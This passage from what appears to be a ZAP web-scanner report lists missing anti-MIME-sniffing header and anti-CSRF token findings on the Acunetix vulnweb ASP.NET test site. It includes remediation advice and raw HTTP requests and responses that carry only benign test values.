07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        34. POST http://testaspnet.vulnweb.com/Signup.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (399 bytes)
          POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/Signup.aspx
          Content-Length: 1098
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1098 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8wYbzXe%2BsXxDpSfVp4SwbIP85RvA%3D%3D&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13177
          
          
          Response body (13177 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Signup</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Signup.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/rVVS1oArBGNWHuMPoCTb1Ib2vQA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm"
          							align="center">
          							<TR>
          								<TD>Username:</TD>
          								<TD>
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD>
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD>
          							</TR>
          						</TABLE>
          						<BR>
          						<span id="lblStatus">Subscription successfull. Please visit the login page to login.</span>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

      4. 缺少反CSRF令牌 (25)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
